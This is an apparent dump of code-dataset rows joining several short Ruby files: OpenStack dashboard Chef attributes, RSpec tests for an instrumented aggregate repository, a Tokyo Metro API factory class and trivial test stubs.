default['openstack']['dashboard']['csrf_cookie_secure'] = true
default['openstack']['dashboard']['session_cookie_secure'] = true
default['openstack']['dashboard']['keystone_multidomain_support'] = false
default['openstack']['dashboard']['identity_api_version'] = 2.0
default['openstack']['dashboard']['keystone_default_domain'] = 'Default'
default['openstack']['dashboard']['console_type'] = 'AUTO'
default['openstack']['dashboard']['keystone_backend']['name'] = 'native'
default['openstack']['dashboard']['keystone_backend']['can_edit_user'] = true
default['openstack']['dashboard']['keystone_backend']['can_edit_group'] = true
default['openstack']['dashboard']['keystone_backend']['can_edit_project'] = true
default['openstack']['dashboard']['keystone_backend']['can_edit_domain'] = true
default['openstack']['dashboard']['keystone_backend']['can_edit_role'] = true
default['openstack']['dashboard']['log_level']['horizon'] = 'INFO'
default['openstack']['dashboard']['log_level']['openstack_dashboard'] = 'INFO'
default['openstack']['dashboard']['log_level']['novaclient'] = 'INFO'
default['openstack']['dashboard']['log_level']['cinderclient'] = 'INFO'
default['openstack']['dashboard']['log_level']['keystoneclient'] = 'INFO'
default['openstack']['dashboard']['log_level']['glanceclient'] = 'INFO'
default['openstack']['dashboard']['log_level']['neutronclient'] = 'INFO'
default['openstack']['dashboard']['log_level']['heatclient'] = 'INFO'
default['openstack']['dashboard']['log_level']['ceilometerclient'] = 'INFO'
default['openstack']['dashboard']['log_level']['troveclient'] = 'INFO'
default['openstack']['dashboard']['log_level']['swiftclient'] = 'INFO'
default['openstack']['dashboard']['log_level']['openstack_auth'] = 'INFO'
default['openstack']['dashboard']['log_level']['nose.plugins.manager'] = 'INFO'
default['openstack']['dashboard']['log_level']['django'] = 'INFO'
default['openstack']['dashboard']['password_autocomplete'] = 'on'
default['openstack']['dashboard']['simple_ip_management'] = false
default['openstack']['dashboard']['neutron']['enable_lb'] = false
default['openstack']['dashboard']['neutron']['enable_quotas'] = true
| 55.057592 | 137 | 0.705972 |
1c3d188a5e85c84ecfb13c49f9af4d6317bec77b | 3,811 | require 'spec_helper'
require 'active_support/notifications'
module AggregateRoot
  # Specs for InstrumentedRepository: a decorator around Repository that
  # forwards #load / #store / #with_aggregate calls unchanged while emitting
  # ActiveSupport::Notifications events describing each operation.
  RSpec.describe InstrumentedRepository do
    describe "#load" do
      specify "wraps around original implementation" do
        repository = instance_double(Repository)
        instrumented_repository = InstrumentedRepository.new(repository, ActiveSupport::Notifications)
        aggregate = Order.new
        # Delegation check: the decorator must pass its arguments through verbatim.
        expect(repository).to receive(:load).with(aggregate, 'SomeStream')
        instrumented_repository.load(aggregate, 'SomeStream')
      end

      specify "instruments" do
        repository = instance_double(Repository)
        instrumented_repository = InstrumentedRepository.new(repository, ActiveSupport::Notifications)
        # Subscribe before acting so the notification emitted by #load is captured.
        subscribe_to("load.repository.aggregate_root") do |notification_calls|
          aggregate = Order.new
          expect(repository).to receive(:load).with(aggregate, 'SomeStream')
          instrumented_repository.load(aggregate, 'SomeStream')
          # Exactly one notification, carrying the aggregate and stream name.
          expect(notification_calls).to eq([{
            aggregate: aggregate,
            stream: 'SomeStream',
          }])
        end
      end
    end

    describe "#store" do
      specify "wraps around original implementation" do
        repository = instance_double(Repository)
        instrumented_repository = InstrumentedRepository.new(repository, ActiveSupport::Notifications)
        aggregate = Order.new
        expect(repository).to receive(:store).with(aggregate, 'SomeStream')
        instrumented_repository.store(aggregate, 'SomeStream')
      end

      specify "instruments" do
        repository = instance_double(Repository)
        instrumented_repository = InstrumentedRepository.new(repository, ActiveSupport::Notifications)
        subscribe_to("store.repository.aggregate_root") do |notification_calls|
          aggregate = Order.new
          aggregate.create
          aggregate.expire
          # Snapshot the pending events before #store, for payload comparison below.
          events = aggregate.unpublished_events.to_a
          expect(repository).to receive(:store).with(aggregate, 'SomeStream')
          instrumented_repository.store(aggregate, 'SomeStream')
          # NOTE(review): version -1 appears to be the aggregate's pre-persistence
          # version (nothing loaded yet) — confirm against InstrumentedRepository.
          expect(notification_calls).to eq([{
            aggregate: aggregate,
            version: -1,
            stored_events: events,
            stream: 'SomeStream',
          }])
        end
      end
    end

    describe "#with_aggregate" do
      specify "instruments both load & store" do
        repository = instance_double(Repository)
        instrumented_repository = InstrumentedRepository.new(repository, ActiveSupport::Notifications)
        # Nested subscriptions: both the load and the store notifications emitted
        # by the single #with_aggregate call must be observed.
        subscribe_to("load.repository.aggregate_root") do |load_notification_calls|
          aggregate = Order.new
          subscribe_to("store.repository.aggregate_root") do |store_notification_calls|
            events = nil
            expect(repository).to receive(:load).with(aggregate, 'SomeStream')
            expect(repository).to receive(:store).with(aggregate, 'SomeStream')
            instrumented_repository.with_aggregate(aggregate, 'SomeStream') do
              aggregate.create
              aggregate.expire
              # Captured inside the block so the outer expectation can use it.
              events = aggregate.unpublished_events.to_a
            end
            expect(store_notification_calls).to eq([{
              aggregate: aggregate,
              version: -1,
              stored_events: events,
              stream: 'SomeStream',
            }])
          end
          expect(load_notification_calls).to eq([{
            aggregate: aggregate,
            stream: 'SomeStream',
          }])
        end
      end
    end

    # Helper: subscribes to the given notification name for the duration of the
    # block and yields an array that accumulates each notification's payload.
    def subscribe_to(name)
      received_payloads = []
      callback = ->(_name, _start, _finish, _id, payload) { received_payloads << payload }
      ActiveSupport::Notifications.subscribed(callback, name) do
        yield received_payloads
      end
    end
  end
end
| 34.963303 | 102 | 0.65206 |
5d97f63073c24b95ab55ac5014c6a7d7acfaedc6 | 845 | # Factory Pattern class (metaclass) for generating instances from a hash retrieved from the API
class TokyoMetro::Factory::Generate::Api::TrainOperation::Info < TokyoMetro::Factory::Generate::Api::MetaClass::Info::Fundamental

  include ::TokyoMetro::ClassNameLibrary::Api::TrainOperation

  # List of variables forwarded to the Info class, in positional order:
  # id, dc:date, dct:valid, operator, time of origin, railway line,
  # information status, processed information text.
  # @return [::Array]
  def variables
    # Several payload fields are ISO-8601 timestamps; parse them uniformly.
    parse_time = ->(key) { DateTime.parse(@hash[key]) }
    [
      @hash["\@id"],
      parse_time.call("dc:date"),
      parse_time.call("dct:valid"),
      @hash["odpt:operator"],
      parse_time.call("odpt:timeOfOrigin"),
      @hash["odpt:railway"],
      @hash["odpt:trainInformationStatus"],
      @hash["odpt:trainInformationText"].process_train_operation_text
    ]
  end

end
| 33.8 | 129 | 0.698225 |
4a751c18fc07e97e2a9702ccb4ef161b96877501 | 109 | require 'spec_helper'
# Smoke spec: the Cqslight::Command constant must exist and be a plain Module.
describe Cqslight do
  specify { expect(Cqslight::Command).to be_instance_of(Module) }
end
| 18.166667 | 60 | 0.770642 |
01d92f8a6c45053b0f963b69979cc22482194378 | 75 | require 'test_helper'
# Test case for the WritingsHelper view helpers. Currently a placeholder with
# no examples; ActionView::TestCase infers the helper under test from the
# class name.
class WritingsHelperTest < ActionView::TestCase
end
| 15 | 47 | 0.826667 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.